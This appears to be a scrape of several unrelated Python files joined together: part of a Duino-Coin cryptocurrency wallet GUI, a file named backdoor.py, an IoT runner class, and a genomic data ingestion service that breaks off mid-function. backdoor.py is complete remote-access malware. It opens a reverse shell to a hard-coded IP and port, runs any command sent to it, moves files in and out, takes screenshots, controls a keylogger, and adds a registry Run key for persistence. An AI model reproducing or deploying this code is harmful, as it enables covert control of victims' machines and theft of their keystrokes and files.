balanceLabel.grid(row=1,
column=0,
columnspan=3,
sticky=S + W,
padx=(5, 0))
wbalanceLabel = Label(
master,
textvariable=wbalancetext,
font=textFont4,
foreground=FOREGROUND_COLOR_SECONDARY,
background=BACKGROUND_COLOR)
wbalanceLabel.grid(row=2,
column=0,
columnspan=3,
sticky=S + W,
padx=(5, 0))
balanceusdtext = StringVar()
balanceusdtext.set(get_string("please_wait"))
Label(
master,
textvariable=balanceusdtext,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=1,
column=3,
sticky=S + E,
pady=(0, 1.5),
padx=(0, 5))
separator = ttk.Separator(master, orient="horizontal")
separator.grid(
row=4,
column=0,
sticky=N + S + E + W,
columnspan=4,
padx=(5, 5),
pady=(0, 5))
def clear_recipient_placeholder(self):
recipient.delete("0", "100")
def clear_amount_placeholder(self):
amount.delete("0", "100")
Label(
master,
text=get_string("recipient"),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=5,
column=0,
sticky=W + S,
padx=(5, 0))
recipient = Entry(
master,
border="0",
font=TEXT_FONT,
foreground=FOREGROUND_COLOR_SECONDARY,
background=BACKGROUND_COLOR)
recipient.grid(row=5,
column=1,
sticky=N + W + S + E,
columnspan=3,
padx=(0, 5))
recipient.insert("0", "revox")
recipient.bind("<FocusIn>", clear_recipient_placeholder)
Label(
master,
text=get_string("amount"),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=6,
column=0,
sticky=W + S,
padx=(5, 0))
amount = Entry(
master,
border="0",
font=TEXT_FONT,
foreground=FOREGROUND_COLOR_SECONDARY,
background=BACKGROUND_COLOR)
amount.grid(row=6,
column=1,
sticky=N + W + S + E,
columnspan=3,
padx=(0, 5))
amount.insert("0", str(VERSION))
amount.bind("<FocusIn>", clear_amount_placeholder)
sendLabel = Button(
master,
text=get_string("send_funds"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR)
sendLabel.grid(
row=8,
column=0,
sticky=N + S + E + W,
columnspan=4,
padx=(5),
pady=(1, 2))
sendLabel.bind("<Button-1>", send_funds_protocol)
wrapLabel = Button(
master,
text=get_string("wrap_duco"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR)
wrapLabel.grid(
row=9,
column=0,
sticky=N + S + E + W,
columnspan=2,
padx=(5, 1),
pady=(1, 5))
wrapLabel.bind("<Button-1>", wrapper_window)
wrapLabel = Button(
master,
text=get_string("unwrap_duco"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR)
wrapLabel.grid(
row=9,
column=2,
sticky=N + S + E + W,
columnspan=2,
padx=(1, 5),
pady=(1, 5))
wrapLabel.bind("<Button-1>", unwrapper_window)
separator = ttk.Separator(master, orient="horizontal")
separator.grid(
row=10,
column=0,
sticky=N + S + E + W,
columnspan=4,
padx=(5, 5))
Label(
master,
text=get_string("estimated_profit"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=11,
column=0,
sticky=S + W,
columnspan=4,
pady=(5, 0),
padx=(5, 0))
sessionprofittext = StringVar()
sessionprofittext.set(get_string("please_wait_calculating"))
sessionProfitLabel = Label(
master,
textvariable=sessionprofittext,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
sessionProfitLabel.grid(
row=12,
column=0,
sticky=W,
columnspan=4,
padx=5)
minuteprofittext = StringVar()
minuteProfitLabel = Label(
master,
textvariable=minuteprofittext,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
minuteProfitLabel.grid(
row=13,
column=0,
sticky=W,
columnspan=4,
padx=5)
hourlyprofittext = StringVar()
hourlyProfitLabel = Label(
master,
textvariable=hourlyprofittext,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
hourlyProfitLabel.grid(
row=14,
column=0,
sticky=W,
columnspan=4,
padx=5)
dailyprofittext = StringVar()
dailyprofittext.set("")
dailyProfitLabel = Label(
master,
textvariable=dailyprofittext,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
dailyProfitLabel.grid(
row=15,
column=0,
sticky=W,
columnspan=4,
padx=5)
separator = ttk.Separator(master, orient="horizontal")
separator.grid(
row=16,
column=0,
sticky=N + S + E + W,
columnspan=4,
padx=5)
Label(
master,
text=get_string("local_transactions"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=17,
column=0,
sticky=S + W,
columnspan=4,
pady=(5, 0),
padx=(5, 0))
transactionstext = StringVar()
transactionstext.set("")
transactionstextLabel = Label(
master,
textvariable=transactionstext,
font=TEXT_FONT,
justify=LEFT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
transactionstextLabel.grid(
row=18,
column=0,
sticky=W,
columnspan=4,
padx=5,
pady=(0, 5))
separator = ttk.Separator(master,
orient="horizontal")
separator.grid(
row=19,
column=0,
sticky=N + S + E + W,
columnspan=4,
padx=5,
pady=(0, 10))
original = Image.open(resources + "transactions.png")
resized = original.resize((58, 58), Image.ANTIALIAS)
transactions = ImageTk.PhotoImage(resized)
transactions.image = transactions
transactionsLabel = Label(
master,
image=transactions,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
transactionsLabel.grid(
row=20,
column=0,
sticky=N + S + W + E,
pady=(0, 5))
transactionsLabel.bind("<Button>", transactions_window)
original = Image.open(resources + "calculator.png")
resized = original.resize((58, 58), Image.ANTIALIAS)
calculator = ImageTk.PhotoImage(resized)
calculator.image = calculator
calculatorLabel = Label(
master,
image=calculator,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
calculatorLabel.grid(
row=20,
column=1,
sticky=N + S + W + E,
padx=(0, 5),
pady=(0, 5))
calculatorLabel.bind("<Button>", currency_converter_window)
original = Image.open(resources + "stats.png")
resized = original.resize((58, 58), Image.ANTIALIAS)
stats = ImageTk.PhotoImage(resized)
stats.image = stats
statsLabel = Label(
master,
image=stats,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
statsLabel.grid(
row=20,
column=2,
sticky=N + S + W + E,
padx=(0, 5),
pady=(0, 5))
statsLabel.bind("<Button>", statistics_window)
original = Image.open(resources + "settings.png")
resized = original.resize((58, 58), Image.ANTIALIAS)
settings = ImageTk.PhotoImage(resized)
settings.image = settings
settingsLabel = Label(
master,
image=settings,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
settingsLabel.grid(
row=20,
column=3,
sticky=N + S + W + E,
padx=(0, 10),
pady=(0, 5))
settingsLabel.bind("<Button>", settings_window)
root.iconphoto(True, PhotoImage(file=resources + "duco_color.png"))
start_balance = global_balance
curr_bal = start_balance
profit_calculator(start_balance)
update_balance_labels()
root.mainloop()
try:
from pypresence import Presence
except ModuleNotFoundError:
print("Pypresence is not installed."
+ "Wallet will try to install it. "
+ "If it fails, please manually install \"pypresence\".")
install("pypresence")
try:
from PIL import Image, ImageTk
except ModuleNotFoundError:
print("Pillow is not installed. "
+ "Wallet will try to install it. "
+ "If it fails, please manually install \"Pillow\".")
install("Pillow")
try:
from notifypy import Notify
except ModuleNotFoundError:
print("Notify-py is not installed. "
+ "Continuing without notification system.")
notificationsEnabled = False
else:
notificationsEnabled = True
try:
from cryptography.fernet import Fernet, InvalidToken
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
backend = default_backend()
except ModuleNotFoundError:
print("Cryptography is not installed. "
+ "Please manually install \"cryptography\"."
+ "\nExiting in 15s.")
sleep(15)
_exit(1)
try:
import secrets
except ModuleNotFoundError:
print("Secrets is not installed. "
+ "Please manually install \"secrets\"."
+ "\nExiting in 15s.")
sleep(15)
_exit(1)
try:
from base64 import urlsafe_b64decode as b64d
from base64 import urlsafe_b64encode as b64e
except ModuleNotFoundError:
print("Base64 is not installed. "
+ "Please manually install \"base64\""
+ "\nExiting in 15s.")
sleep(15)
_exit(1)
try:
import tronpy
from tronpy.keys import PrivateKey
TRONPY_ENABLED = True
except ModuleNotFoundError:
TRONPY_ENABLED = False
print("Tronpy is not installed. "
+ "Please manually install \"tronpy\" "
+ "if you intend on using wDUCO wrapper.")
else:
try:
tron = tronpy.Tron()
wduco = tron.get_contract("TWYaXdxA12JywrUdou3PFD1fvx2PWjqK9U")
except:
TRONPY_ENABLED = False
print("Tron-side error, disabling wrapper for this session")
with urlopen(
"https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duino-coin/gh-pages/"
+ "serverip.txt") as content:
content = content.read().decode().splitlines()
pool_address = content[0]
pool_port = content[1]
if not path.exists(resources):
mkdir(resources)
with sqlconn(resources + "/wallet.db") as con:
cur = con.cursor()
cur.execute(
"""CREATE TABLE IF NOT EXISTS
Transactions(Date TEXT, amount REAL)""")
cur.execute(
"""CREATE TABLE IF NOT EXISTS
UserData(username TEXT, password TEXT, useWrapper TEXT)""")
con.commit()
if not Path(resources + "duco.png").is_file():
urlretrieve("https://i.imgur.com/9JzxR0B.png", resources + "duco.png")
if not Path(resources + "duco_color.png").is_file():
urlretrieve(
"https://github.com/"
+ "revoxhere/"
+ "duino-coin/blob/master/"
+ "Resources/duco.png?raw=true",
resources + "duco_color.png")
if not Path(resources + "calculator.png").is_file():
urlretrieve("https://i.imgur.com/iqE28Ej.png",
resources + "calculator.png")
if not Path(resources + "exchange.png").is_file():
urlretrieve("https://i.imgur.com/0qMtoZ7.png",
resources + "exchange.png")
if not Path(resources + "discord.png").is_file():
urlretrieve("https://i.imgur.com/LoctALa.png",
resources + "discord.png")
if not Path(resources + "github.png").is_file():
urlretrieve("https://i.imgur.com/PHEfWbl.png",
resources + "github.png")
if not Path(resources + "settings.png").is_file():
urlretrieve("https://i.imgur.com/NNEI4WL.png",
resources + "settings.png")
if not Path(resources + "transactions.png").is_file():
urlretrieve("https://i.imgur.com/nbVPlKk.png",
resources + "transactions.png")
if not Path(resources + "stats.png").is_file():
urlretrieve("https://i.imgur.com/KRfHZUM.png",
resources + "stats.png")
if not Path(resources + "langs.json").is_file():
urlretrieve(
"https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duino-coin/master/Resources/"
+ "Wallet_langs.json",
resources + "langs.json")
# Load language strings depending on system locale
with open(resources + "langs.json", "r", encoding="utf-8") as lang_file:
lang_file = jsonloads(lang_file.read())
try:
locale = getdefaultlocale()[0]
if locale.startswith("es"):
lang = "spanish"
elif locale.startswith("pl"):
lang = "polish"
elif locale.startswith("fr"):
lang = "french"
elif locale.startswith("bg"):
lang = "bulgarian"
elif locale.startswith("nl"):
lang = "dutch"
elif locale.startswith("ru"):
lang = "russian"
elif locale.startswith("de"):
lang = "german"
elif locale.startswith("tr"):
lang = "turkish"
elif locale.startswith("zh"):
lang = "chinese_simplified"
else:
lang = "english"
except IndexError:
lang = "english"
if __name__ == "__main__":
with sqlconn(resources + "wallet.db") as con:
cur = con.cursor()
cur.execute("SELECT COUNT(username) FROM UserData")
userdata_count = cur.fetchall()[0][0]
if userdata_count < 1:
root = Tk()
lf = LoginFrame(root)
root.mainloop()
cur = con.cursor()
cur.execute("SELECT COUNT(username) FROM UserData")
userdata_count = cur.fetchall()[0][0]
if userdata_count >= 1:
loading_window()
cur = con.cursor()
cur.execute("SELECT * FROM UserData")
userdata_query = cur.fetchone()
username = userdata_query[0]
passwordEnc = (userdata_query[1]).decode("utf-8")
password = b64decode(passwordEnc).decode("utf8")
status.config(text=get_string("preparing_wallet_window"))
loading.update()
try:
# Start duco price updater
get_duco_price()
get_balance()
init_rich_presence()
Thread(target=update_rich_presence).start()
try:
# Destroy loading dialog and start the main wallet window
loading.destroy()
except Exception:
pass
root = Tk()
my_gui = Wallet(root)
except Exception as e:
print(e)
_exit(0)
|
backdoor.py
|
import socket
import json
import subprocess
import time
import os
import pyautogui
import keylogger
import threading
import shutil
import sys
def reliable_send(data):
jsondata = json.dumps(data)
s.send(jsondata.encode())
def reliable_recv():
data = ''
while True:
try:
data = data + s.recv(1024).decode().rstrip()
return json.loads(data)
except ValueError:
continue
def is_admin():
global admin
try:
temp = os.listdir(os.sep.join([os.environ.get('SystemRoot', 'C:\windows'),'temp']))
except:
admin = "[!!!]User Privileges!!!"
else :
admin = "[+] Admin Privileges!!!"
def download_file(file_name):
f = open(file_name, 'wb')
s.settimeout(1)
chunk = s.recv(1024)
while chunk:
f.write(chunk)
try:
chunk = s.recv(1024)
except socket.timeout as e:
break
s.settimeout(None)
f.close()
def upload_file(file_name):
f = open(file_name, 'rb')
s.send(f.read())
def screenshot():
myScreenshot = pyautogui.screenshot()
myScreenshot.save('screen.png')
def persist(reg_name, copy_name):
file_location = os.environ['appdata'] + '\\' + copy_name
try:
if not os.path.exists(file_location):
shutil.copyfile(sys.executable, file_location)
subprocess.call('reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ' + reg_name + ' /t REG_SZ /d "' + file_location + '"', shell=True)
reliable_send('[+] Created Persistence With Reg Key: ' + reg_name)
else:
reliable_send('[+] Persistence Already Exists')
except:
reliable_send('[+] Error Creating Persistence With The Target Machine')
def connection():
while True:
time.sleep(20)
try:
s.connect(('192.168.43.235', 5555))
shell()
s.close()
break
except:
connection()
def shell():
while True:
command = reliable_recv()
if command == 'quit':
break
elif command == 'background':
pass
elif command == 'help':
pass
elif command == 'clear':
pass
elif command[:3] == 'cd ':
os.chdir(command[3:])
elif command[:5] =='check':
try :
is_admin()
reliable_send(admin)
except:
reliable_send("Something Went Wrong")
elif command[:6] == 'upload':
download_file(command[7:])
elif command[:8] == 'download':
upload_file(command[9:])
elif command[:10] == 'screenshot':
screenshot()
upload_file('screen.png')
os.remove('screen.png')
elif command[:12] == 'keylog_start':
keylog = keylogger.Keylogger()
t = threading.Thread(target=keylog.start)
t.start()
reliable_send('[+] Keylogger Started!')
elif command[:11] == 'keylog_dump':
logs = keylog.read_logs()
reliable_send(logs)
elif command[:11] == 'keylog_stop':
keylog.self_destruct()
t.join()
reliable_send('[+] Keylogger Stopped!')
elif command[:11] == 'persistence':
reg_name, copy_name = command[12:].split(' ')
persist(reg_name, copy_name)
elif command[:7] == 'sendall':
subprocess.Popen(command[8:], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,stdin = subprocess.PIPE)
else:
execute = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,stdin=subprocess.PIPE)
result = execute.stdout.read() + execute.stderr.read()
result = result.decode()
reliable_send(result)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection()
|
Runner.py
|
# Copyright (c) 2017 Iotic Labs Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://github.com/Iotic-Labs/py-IoticBulkData/blob/master/LICENSE
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import unicode_literals
from os import getpid, kill, path
from threading import Thread
from time import sleep
import logging
logger = logging.getLogger(__name__)
from IoticAgent import IOT
from .compat import SIGUSR1
from .import_helper import getItemFromModule
from .Stash import Stash
class Runner(object): # pylint: disable=too-many-instance-attributes
def __init__(self, name, config, stop, datapath):
"""
"""
self.__name = name
self.__config = config
self.__stop = stop
self.__datapath = datapath
#
self.__module = None
self.__agentfile = None
self.__workers = 1
#
self.__validate_config()
#
self.__agent = IOT.Client(config=self.__agentfile)
fname = path.join(datapath, name + '.json')
self.__stash = Stash(fname, self.__agent, self.__workers)
self.__modinst = self.__module(self.__stash, self.__config, self.__stop)
self.__thread = None
def __validate_config(self):
if 'import' not in self.__config:
msg = "[%s] Config requires import = module.name" % self.__name
logger.error(msg)
raise ValueError(msg)
self.__module = getItemFromModule(self.__config['import'])
if 'agent' not in self.__config:
msg = "[%s] Config requires agent = /path/to/agent.ini" % self.__name
logger.error(msg)
raise ValueError(msg)
if not path.exists(self.__config['agent']):
msg = "[%s] agent = %s file not found" % (self.__name, self.__config['agent'])
logger.error(msg)
raise ValueError(msg) # note: valueerror since nobody cares file not found
self.__agentfile = self.__config['agent']
if 'workers' in self.__config:
self.__workers = int(self.__config['workers'])
def start(self):
self.__agent.start()
self.__thread = Thread(target=self.__run, name=('runner-%s' % self.__name))
self.__thread.start()
def stop(self):
self.__stop.set()
def __run(self):
with self.__stash:
try:
self.__modinst.run()
except:
logger.critical("Runner died! Aborting.", exc_info=True)
kill(getpid(), SIGUSR1)
if not self.__stop.is_set():
while not self.__stash.queue_empty:
logger.info("Runner finished but stop not set! Draining work queue.")
sleep(5)
self.__agent.stop()
def is_alive(self):
return self.__thread.is_alive()
|
ingestion_listener.py
|
import argparse
import atexit
import boto3
import botocore.exceptions
import cgi
import datetime
import elasticsearch
import io
import json
import os
import psycopg2
import re
import requests # XXX: C4-211 should not be needed but is // KMP needs this, too, until subrequest posts work
import signal
import structlog
import threading
import time
import webtest
import tempfile
from dcicutils.env_utils import is_stg_or_prd_env
from dcicutils.misc_utils import VirtualApp, ignored, check_true, full_class_name, environ_bool, PRINT
from pyramid import paster
from pyramid.httpexceptions import HTTPNotFound, HTTPMovedPermanently # , HTTPServerError
from pyramid.request import Request
# Possibly still needed by some commented-out code.
# from pyramid.response import Response
from pyramid.view import view_config
from snovault.util import debug_log
from vcf import Reader
from .ingestion.vcf_utils import VCFParser, StructuralVariantVCFParser
from .commands.reformat_vcf import runner as reformat_vcf
from .commands.add_altcounts_by_gene import main as add_altcounts
from .ingestion.common import metadata_bundles_bucket, get_parameter, IngestionReport
from .ingestion.exceptions import UnspecifiedFormParameter, SubmissionFailure # , BadParameter
from .ingestion.processors import get_ingestion_processor
# from .types.base import get_item_or_none
from .types.ingestion import SubmissionFolio, IngestionSubmission
from .util import (
resolve_file_path, gunzip_content,
debuglog, get_trusted_email, beanstalk_env_from_request,
subrequest_object, register_path_content_type, vapp_for_email, vapp_for_ingestion,
)
from .ingestion.queue_utils import IngestionQueueManager
from .ingestion.variant_utils import VariantBuilder, StructuralVariantBuilder
log = structlog.getLogger(__name__)
EPILOG = __doc__
INGESTION_QUEUE = 'ingestion_queue'
VARIANT_SCHEMA = resolve_file_path('./schemas/variant.json')
VARIANT_SAMPLE_SCHEMA = resolve_file_path('./schemas/variant_sample.json')
STATUS_QUEUED = 'Queued'
STATUS_INGESTED = 'Ingested'
STATUS_DISABLED = 'Ingestion disabled'
STATUS_ERROR = 'Error'
STATUS_IN_PROGRESS = 'In progress'
SHARED = 'shared'
STRUCTURAL_VARIANT_SCHEMA = resolve_file_path("./schemas/structural_variant.json")
STRUCTURAL_VARIANT_SAMPLE_SCHEMA = resolve_file_path(
"./schemas/structural_variant_sample.json"
)
def includeme(config):
# config.add_route('process_ingestion', '/process_ingestion')
config.add_route('queue_ingestion', '/queue_ingestion')
config.add_route('ingestion_status', '/ingestion_status')
config.add_route('submit_for_ingestion', '/submit_for_ingestion')
config.registry[INGESTION_QUEUE] = IngestionQueueManager(config.registry)
config.scan(__name__)
SUBMISSION_PATTERN = re.compile(r'^/ingestion-submissions/([0-9a-fA-F-]+)(|/.*)$')
register_path_content_type(path='/submit_for_ingestion', content_type='multipart/form-data')
def extract_submission_info(request):
matched = SUBMISSION_PATTERN.match(request.path_info)
if matched:
submission_id = matched.group(1)
else:
raise SubmissionFailure("request.path_info is not in the expected form: %s" % request.path_info)
instance = subrequest_object(request, submission_id)
return submission_id, instance
@view_config(name='submit_for_ingestion', request_method='POST', context=IngestionSubmission,
# Apparently adding this 'accept' causes discrimination on incoming requests not to find this method.
# We do want this type, and instead we check the request to make sure we got it, but we omit it here
# for practical reasons. -kmp 10-Sep-2020
# accept='multipart/form-data',
permission='edit')
@debug_log
def submit_for_ingestion(context, request):
ignored(context)
check_true(request.content_type == 'multipart/form-data', # even though we can't declare we accept this
"Expected request to have content_type 'multipart/form-data'.", error_class=SubmissionFailure)
bs_env = beanstalk_env_from_request(request)
bundles_bucket = metadata_bundles_bucket(request.registry)
datafile = request.POST['datafile']
if not isinstance(datafile, cgi.FieldStorage):
# e.g., specifically it might be b'' when no file is selected,
# but IMPORTANTLY, cgi.FieldStorage has no predefined boolean value,
# so we can't just ask to check 'not datafile'. Sigh. -kmp 5-Aug-2020
raise UnspecifiedFormParameter('datafile')
filename = datafile.filename
override_name = request.POST.get('override_name', None)
parameters = dict(request.POST) # Convert to regular dictionary, which is also a copy
parameters['datafile'] = filename
# Other parameters, like validate_only, will ride in on parameters via the manifest on s3
submission_id, instance = extract_submission_info(request)
# The three arguments institution, project, and ingestion_type were needed in the old protocol
# but are not needed in the new protocol because someone will have set up the IngestionSubmission
# object already with the right values. We tolerate them here, but we insist they be consistent (redundant).
# Note, too, that we use the 'update=True' option that causes them to be added to our parameters if they are
# missing, defaulted from the previous item, so that they will be written to the parameter block stored on S3.
# (We could do that differently now, by looking them up dynamically, but rather than risk making a mistake,
# I just went with path of least resistance for now.)
# -kmp 2-Dec-2020
institution = instance['institution']['@id']
institution_arg = get_parameter(parameters, "institution", default=institution, update=True)
if institution_arg != institution:
# If the "institution" argument was passed, which we no longer require, make sure it's consistent.
raise SubmissionFailure("'institution' was supplied inconsistently for submit_for_ingestion.")
project = instance['project']['@id']
project_arg = get_parameter(parameters, "project", default=project, update=True)
if project_arg != project:
# If the "project" argument was passed, which we no longer require, make sure it's consistent.
raise SubmissionFailure("'project' was supplied inconsistently for submit_for_ingestion.")
ingestion_type = instance['ingestion_type']
ingestion_type_arg = get_parameter(parameters, "ingestion_type", default=ingestion_type, update=True)
if ingestion_type_arg != ingestion_type:
# If the "ingestion_type" argument was passed, which we no longer require, make sure it's consistent.
raise SubmissionFailure("'ingestion_type' was supplied inconsistently for submit_for_ingestion.")
# ``input_file`` contains the actual file data which needs to be
# stored somewhere.
input_file_stream = request.POST['datafile'].file
input_file_stream.seek(0)
# NOTE: Some reference information about uploading files to s3 is here:
# https://boto3.amazonaws.com/v1/documentation/api/latest/guide/s3-uploading-files.html
# submission.set_item_detail(object_name=manifest['object_name'], parameters=manifest['parameters'],
# institution=institution, project=project)
# submission_id = str(uuid.uuid4())
_, ext = os.path.splitext(filename)
object_name = "{id}/datafile{ext}".format(id=submission_id, ext=ext)
manifest_name = "{id}/manifest.json".format(id=submission_id)
s3_client = boto3.client('s3')
upload_time = datetime.datetime.utcnow().isoformat()
success = True
message = "Uploaded successfully."
try:
s3_client.upload_fileobj(input_file_stream, Bucket=bundles_bucket, Key=object_name)
except botocore.exceptions.ClientError as e:
log.error(e)
success = False
message = "{error_type}: {error_message}".format(error_type=full_class_name(e), error_message=str(e))
# This manifest will be stored in the manifest.json file on on s3 AND will be returned from this endpoint call.
manifest_content = {
"filename": filename,
"object_name": object_name,
"submission_id": submission_id,
"submission_uri": SubmissionFolio.make_submission_uri(submission_id),
"beanstalk_env_is_prd": is_stg_or_prd_env(bs_env),
"beanstalk_env": bs_env,
"bucket": bundles_bucket,
"authenticated_userid": request.authenticated_userid,
"email": get_trusted_email(request, context="Submission", raise_errors=False),
"success": success,
"message": message,
"upload_time": upload_time,
"parameters": parameters,
}
manifest_content_formatted = json.dumps(manifest_content, indent=2)
if success:
try:
with io.BytesIO(manifest_content_formatted.encode('utf-8')) as fp:
s3_client.upload_fileobj(fp, Bucket=bundles_bucket, Key=manifest_name)
except botocore.exceptions.ClientError as e:
log.error(e)
message = ("{error_type} (while uploading metadata): {error_message}"
.format(error_type=full_class_name(e), error_message=str(e)))
raise SubmissionFailure(message)
queue_manager = get_queue_manager(request, override_name=override_name)
_, failed = queue_manager.add_uuids([submission_id], ingestion_type=ingestion_type)
if failed:
# If there's a failure, failed will be a list of one problem description since we only submitted one thing.
raise SubmissionFailure(failed[0])
if not success:
raise SubmissionFailure(message)
return manifest_content
@view_config(route_name='ingestion_status', request_method='GET', permission='index')
@debug_log
def ingestion_status(context, request):
""" Status route, essentially identical to indexing_status. """
ignored(context)
queue_manager = request.registry[INGESTION_QUEUE]
n_waiting, n_inflight = queue_manager.get_counts()
return {
'title': 'Ingestion Status',
'waiting': n_waiting,
'inflight': n_inflight
}
DEBUG_SUBMISSIONS = environ_bool("DEBUG_SUBMISSIONS", default=False)
def process_submission(*, submission_id, ingestion_type, app, bundles_bucket=None, s3_client=None):
bundles_bucket = bundles_bucket or metadata_bundles_bucket(app.registry)
s3_client = s3_client or boto3.client('s3')
manifest_name = "{id}/manifest.json".format(id=submission_id)
data = json.load(s3_client.get_object(Bucket=bundles_bucket, Key=manifest_name)['Body'])
email = None
try:
email = data['email']
except KeyError as e:
debuglog("Manifest data is missing 'email' field.")
if DEBUG_SUBMISSIONS:
pass
# import pdb; pdb.set_trace()
debuglog("processing submission %s with email %s" % (submission_id, email))
with vapp_for_email(email=email, app=app) as vapp:
if DEBUG_SUBMISSIONS:
PRINT("PROCESSING FOR %s" % email)
submission = SubmissionFolio(vapp=vapp, ingestion_type=ingestion_type, submission_id=submission_id, log=None)
handler = get_ingestion_processor(ingestion_type)
result = handler(submission)
if DEBUG_SUBMISSIONS:
PRINT("DONE PROCESSING FOR %s" % email)
return {
"result": result,
"ingestion_type": ingestion_type,
"submission_id": submission_id,
}
def verify_vcf_file_status_is_not_ingested(request, uuid, *, expected=True):
""" Verifies the given VCF file has not already been ingested by checking
'file_ingestion_status'
"""
kwargs = {
'environ': request.environ,
'method': 'GET',
'content_type': 'application/json'
}
subreq = Request.blank('/' + uuid, **kwargs)
resp = request.invoke_subrequest(subreq)
if isinstance(resp, HTTPMovedPermanently): # if we hit a redirect, follow it
subreq = Request.blank(resp.location, **kwargs)
resp = request.invoke_subrequest(subreq)
log.info('VCF File Meta: %s' % resp.json)
verified = bool(expected) is (resp.json.get('file_ingestion_status', None) != STATUS_INGESTED)
# if not verified:
# import pdb; pdb.set_trace()
return verified
def patch_vcf_file_status(request, uuids):
""" Patches VCF File status to 'Queued'
NOTE: This process makes queue_ingestion not scale terribly well.
Batching above a certain number may result in 504. There are
also permissions concerns here that are not dealt with.
"""
for uuid in uuids:
kwargs = {
'environ': request.environ,
'method': 'PATCH',
'content_type': 'application/json',
'POST': json.dumps({
'file_ingestion_status': STATUS_QUEUED
}).encode('utf-8')
}
subreq = Request.blank('/' + uuid, **kwargs)
resp = None
try:
if verify_vcf_file_status_is_not_ingested(request, uuid):
resp = request.invoke_subrequest(subreq)
except HTTPNotFound:
log.error('Tried to patch %s but item does not exist: %s' % (uuid, resp))
@view_config(route_name='queue_ingestion', request_method='POST', permission='index')
@debug_log
def queue_ingestion(context, request):
""" Queues uuids as part of the request body for ingestion. Can batch as many as desired in a
single request.
"""
ignored(context)
uuids = request.json.get('uuids', [])
override_name = request.json.get('override_name', None)
return enqueue_uuids_for_request(request, uuids, override_name=override_name)
def enqueue_uuids_for_request(request, uuids, *, ingestion_type='vcf', override_name=None):
response = {
'notification': 'Failure',
'number_queued': 0,
'detail': 'Nothing was queued. Make sure to past in a list of uuids in in "uuids" key.'
}
if uuids is []:
return response
queue_manager = get_queue_manager(request, override_name=override_name)
_, failed = queue_manager.add_uuids(uuids)
if not failed:
response['notification'] = 'Success'
response['number_queued'] = len(uuids)
response['detail'] = 'Successfully queued the following uuids: %s' % uuids
if ingestion_type == 'vcf':
patch_vcf_file_status(request, uuids) # extra state management - may not be accurate, hard to get right
else:
response['number_queued'] = len(uuids) - len(failed)
response['detail'] = 'Some uuids failed: %s' % failed
return response
def get_queue_manager(request, *, override_name):
return (request.registry[INGESTION_QUEUE]
if not override_name
else IngestionQueueManager(request.registry, override_name=override_name))
class IngestionListener:
""" Organizes helper functions for the ingestion listener """
POLL_INTERVAL = 10 # seconds between each poll
INGEST_AS_USER = environ_bool('INGEST_AS_USER', default=True) # The new way, but possible to disable for now
def __init__(self, vapp, _queue_manager=None, _update_status=None):
self.vapp = vapp
# Get queue_manager
registry = None
if isinstance(self.vapp, (webtest.TestApp, VirtualApp)): # TestApp in testing or VirtualApp in production
registry = self.vapp.app.registry
elif _queue_manager is None: # if we got here, we cannot succeed in starting
raise Exception('Bad arguments given to IngestionListener: %s, %s, %s' %
(self.vapp, _queue_manager, _update_status))
self.queue_manager = IngestionQueueManager(registry) if not _queue_manager else _queue_manager
self.update_status = _update_status
@staticmethod
def should_remain_online(override=None):
""" A function that says whether 'run' should continue. This is provided because it
can be mocked in testing.
:param override: a lambda that will execute when evaluating if specified
:return: True if should stay running, False otherwise
"""
if not override:
return True
return override()
def get_messages(self):
""" Sleeps (as to not hit SQS too frequently) then requests messages,
returning the result bodies.
NOTE: THIS FUNCTION SHOULD NOT BE USED OUTSIDE OF THIS CODE SINCE
IT BLOCKS FOR RATE LIMITING REASONS
:return: messages available on SQS
"""
time.sleep(self.POLL_INTERVAL) # sleep here before polling again
return self.queue_manager.receive_messages()
def delete_messages(self, messages):
""" Deletes messages from SQS (after they have been processed). Does not return
anything but will log if messages fail deletion.
:param messages: messages to be deleted
"""
failed = self.queue_manager.delete_messages(messages)
while True:
debuglog("Trying to delete messages")
tries = 3
if failed:
debuglog("Failed to delete messages")
if tries > 0:
failed = self.queue_manager.delete_messages(failed) # try again
tries -= 1
else:
log.error('Failed to delete messages from SQS: %s' % failed)
break
else:
debuglog("Deleted messages")
break
def _patch_value(self, uuid, field, value):
